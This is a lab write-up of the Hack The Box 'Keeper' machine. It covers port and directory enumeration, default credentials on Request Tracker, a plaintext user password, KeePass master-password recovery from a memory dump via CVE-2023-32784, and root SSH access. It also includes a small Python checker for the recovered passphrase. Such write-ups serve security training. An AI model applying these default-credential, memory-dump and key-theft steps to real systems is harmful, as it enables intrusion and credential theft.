HTB Keeper done
Keeper
OS: Linux
Technology: Request Tracker 4.4.4+dfsg-2ubuntu1
IP Address: 10.10.11.227
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Users and pass:
Default creds for website: http://tickets.keeper.htb/rt/
L: root
P: password
---
From http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27:
U: lnorgaard
P: Welcome2023!
---
Password for keepass database
P: rødgrød med fløde
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.227_nmap 10.10.11.227 ; cat 10.10.11.227_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-07 12:47 UTC
Nmap scan report for 10.10.11.227
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ cat /etc/hosts | grep keeper
10.10.11.227 tickets.keeper.htb keeper.htb
Ffuf: http://keeper.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ffuf -u http://keeper.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o keeper.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://keeper.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : keeper.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 149, Words: 18, Lines: 6, Duration: 47ms]
:: Progress: [122814/122814] :: Job [1/1] :: 806 req/sec :: Duration: [0:02:07] :: Errors: 0 ::
Ffuf: http://tickets.keeper.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ffuf -u http://tickets.keeper.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o tickets.keeper.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://tickets.keeper.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : tickets.keeper.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 458ms]
m [Status: 200, Size: 2309, Words: 247, Lines: 112, Duration: 429ms]
rtf.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5459ms]
rtf.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5463ms]
rtf [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5475ms]
rt.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5664ms]
rte-snippets.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5512ms]
rte-snippets.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5506ms]
rte-snippets.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5522ms]
rte-snippets.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5531ms]
rte-snippets.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5538ms]
rte-snippets [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5546ms]
rte.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5551ms]
rte.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5565ms]
rte.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5571ms]
rte.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5583ms]
rte.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5587ms]
rte [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5599ms]
rta.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5609ms]
rt.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5681ms]
rt.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5684ms]
rt.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5699ms]
rt.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5709ms]
rt [Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 5717ms]
rta.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5617ms]
rta.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5633ms]
rta.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5641ms]
rta.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5651ms]
rta [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5660ms]
rtf.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 63ms]
rti.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 54ms]
rtf.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 59ms]
rti.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 77ms]
rti [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 77ms]
rti.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 87ms]
rti.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 87ms]
rti.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 87ms]
rtl.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 107ms]
rtl.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 107ms]
rtl.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 108ms]
rtl [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 108ms]
rtl.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 108ms]
rtl.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 117ms]
rtm.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 118ms]
rtm.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 131ms]
rtm [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 132ms]
rtm.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 132ms]
rtm.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 131ms]
rtm.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 133ms]
rtr [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 137ms]
rtr.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 143ms]
rtr.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 149ms]
rtr.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 154ms]
rtv [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 189ms]
rtr.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtr.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtv.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtv.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtv.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 192ms]
rtv.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 216ms]
rtv.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 218ms]
rtf.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 7877ms]
Open website: http://10.10.11.227/
Redirection to another website: tickets.keeper.htb/rt/
Login to PA: http://tickets.keeper.htb/rt/
Software: Request Tracker 4.4.4+dfsg-2ubuntu1
Default creds:
L: root
P: password
Find another username and its password
Found a new username
MENU --> Admin --> Users --> Select
http://tickets.keeper.htb/rt/Admin/Users/
---
Details about username:
lnorgaard
P: Welcome2023!
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
SSH login as user: lnorgaard
L: lnorgaard
P: Welcome2023!
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ssh lnorgaard@keeper.htb
The authenticity of host 'keeper.htb (10.10.11.227)' can't be established.
ED25519 key fingerprint is SHA256:hczMXffNW5M3qOppqsTCzstpLKxrvdBjFYoJXJGpr7w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'keeper.htb' (ED25519) to the list of known hosts.
lnorgaard@keeper.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$
Read flag: user.txt
lnorgaard@keeper:~$ find / -name "user.txt" 2>/dev/null
/home/lnorgaard/user.txt
lnorgaard@keeper:~$
lnorgaard@keeper:~$ cd /home/lnorgaard/
lnorgaard@keeper:~$
lnorgaard@keeper:~$ ls -la
total 85380
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Jul 25 2023 .
drwxr-xr-x 3 root root 4096 May 24 2023 ..
lrwxrwxrwx 1 root root 9 May 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 2023 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 2023 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 2023 .cache
-rw------- 1 lnorgaard lnorgaard 807 May 23 2023 .profile
-rw-r--r-- 1 root root 87391651 Aug 7 15:32 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 2023 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 7 15:18 user.txt
-rw-r--r-- 1 root root 39 Jul 20 2023 .vimrc
lnorgaard@keeper:~$ cat user.txt ; id ; ip a
5ea2af0528f81837a81ccef2cd2c57be
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:38:49 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.227/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:3849/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:3849/64 scope link
valid_lft forever preferred_lft forever
lnorgaard@keeper:~$
Privilege Escalation
Find Keepass database
Unzip file: RT30000.zip
lnorgaard@keeper:~$ ls
RT30000.zip user.txt
lnorgaard@keeper:~$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
lnorgaard@keeper:~$ ls -la
total 332852
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Aug 7 15:37 .
drwxr-xr-x 3 root root 4096 May 24 2023 ..
lrwxrwxrwx 1 root root 9 May 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 2023 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 2023 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 2023 .cache
-rwxr-x--- 1 lnorgaard lnorgaard 253395188 May 24 2023 KeePassDumpFull.dmp
-rwxr-x--- 1 lnorgaard lnorgaard 3630 May 24 2023 passcodes.kdbx
-rw------- 1 lnorgaard lnorgaard 807 May 23 2023 .profile
-rw-r--r-- 1 root root 87391651 Aug 7 15:38 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 2023 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 7 15:18 user.txt
-rw-r--r-- 1 root root 39 Jul 20 2023 .vimrc
lnorgaard@keeper:~$ exit
logout
Download files to local machine
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ scp lnorgaard@keeper.htb:~/KeePassDumpFull.dmp .
lnorgaard@keeper.htb's password:
KeePassDumpFull.dmp 100% 242MB 1.6MB/s 02:35
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ scp lnorgaard@keeper.htb:~/passcodes.kdbx .
lnorgaard@keeper.htb's password:
passcodes.kdbx 100% 3630 48.0KB/s 00:00
Exploit: KeePass 2.X Master Password Dumper (CVE-2023-32784)
[KeePass 2.X Master Password Dumper (CVE-2023-32784)](https://github.com/z-jxy/keepass_dump)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ git clone https://github.com/z-jxy/keepass_dump.git
Cloning into 'keepass_dump'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 10 (delta 0), reused 10 (delta 0), pack-reused 0
Receiving objects: 100% (10/10), 280.26 KiB | 2.92 MiB/s, done.
Run exploit
Found string:
{UNKNOWN}dgrd med flde
After googling, we found the password:
P: rødgrød med fløde
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Keeper/keepass_dump]
└─$ ls
assets keepass_dump.py README.md
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Keeper/keepass_dump]
└─$ python3 keepass_dump.py -f ../KeePassDumpFull.dmp
[*] Searching for masterkey characters
[-] Couldn't find jump points in file. Scanning with slower method.
[*] 0: {UNKNOWN}
[*] 2: d
[*] 3: g
[*] 4: r
[*] 6: d
[*] 7:
[*] 8: m
[*] 9: e
[*] 10: d
[*] 11:
[*] 12: f
[*] 13: l
[*] 15: d
[*] 16: e
[*] Extracted: {UNKNOWN}dgrd med flde
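The dumper's indexed output above reports slot 0 as unknown and never prints slots 1, 5 and 14, which is why the extracted string had to be completed by searching. As an added example (not part of keepass_dump or of the original writeup), this sketch rebuilds the position mask from those lines and checks that the passphrase found fits it; the function names are hypothetical, and the blank values at 7 and 11 are assumed to be spaces.

```python
import re

# Constructed input: the indexed lines keepass_dump.py printed in this writeup.
# Assumption: the blank values at 7 and 11 are spaces lost in the paste.
TOOL_OUTPUT = """\
[*] 0: {UNKNOWN}
[*] 2: d
[*] 3: g
[*] 4: r
[*] 6: d
[*] 7:
[*] 8: m
[*] 9: e
[*] 10: d
[*] 11:
[*] 12: f
[*] 13: l
[*] 15: d
[*] 16: e
"""
LINE = re.compile(r"^\[\*\] (\d+):[ ]?(.*)$")

def parse_known(text):
    """Map index -> recovered character; unrecovered slots are left out."""
    known = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if m and m.group(2) != "{UNKNOWN}":
            known[int(m.group(1))] = m.group(2) or " "
    return known

def missing_indexes(known):
    """Slots the tool never reported a character for."""
    return [i for i in range(max(known) + 1) if i not in known]

def mask(known, gap="_"):
    """Recovered string with a gap marker at every unrecovered slot."""
    return "".join(known.get(i, gap) for i in range(max(known) + 1))

def consistent(candidate, known):
    """Candidate has the recovered length and agrees at every known index."""
    return (len(candidate) == max(known) + 1
            and all(candidate[i] == c for i, c in known.items()))

if __name__ == "__main__":
    known = parse_known(TOOL_OUTPUT)
    print(missing_indexes(known), repr(mask(known)))
    print(consistent("rødgrød med fløde", known))
```

The length check assumes the highest reported index is the last character of the passphrase.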
Open keepass database
I found an SSH key for user root
---
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
Private-Lines: 14
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
Convert ssh key to id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ puttygen putty_ssh_key -O private-openssh -o id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ less id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ head id_rsa
-----BEGIN RSA PRIVATE KEY-----
Login as root
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ chmod 700 id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ssh root@keeper.htb -i id_rsa
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have new mail.
Last login: Wed Aug 7 17:00:23 2024 from 10.10.14.20
root@keeper:~#
Read flag: root.txt
root@keeper:~# cd /root
root@keeper:~# ls -la
total 85384
drwx------ 5 root root 4096 Aug 7 15:18 .
drwxr-xr-x 18 root root 4096 Jul 27 2023 ..
lrwxrwxrwx 1 root root 9 May 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 May 24 2023 .cache
-rw------- 1 root root 20 Jul 27 2023 .lesshst
lrwxrwxrwx 1 root root 9 May 24 2023 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Aug 7 15:18 root.txt
-rw-r--r-- 1 root root 87391651 Jul 25 2023 RT30000.zip
drwxr-xr-x 2 root root 4096 Jul 25 2023 SQL
drwxr-xr-x 2 root root 4096 May 24 2023 .ssh
-rw-r--r-- 1 root root 39 Jul 20 2023 .vimrc
root@keeper:~# cat root.txt ; id ; ip a
3a7d5f87cd6f02b5bfc01261f4cc43e1
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:38:49 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.227/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:3849/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:fe94:3849/64 scope link
valid_lft forever preferred_lft forever
root@keeper:~#
References
[KeePass 2.X Master Password Dumper (CVE-2023-32784)](https://github.com/z-jxy/keepass_dump)
Lessons Learned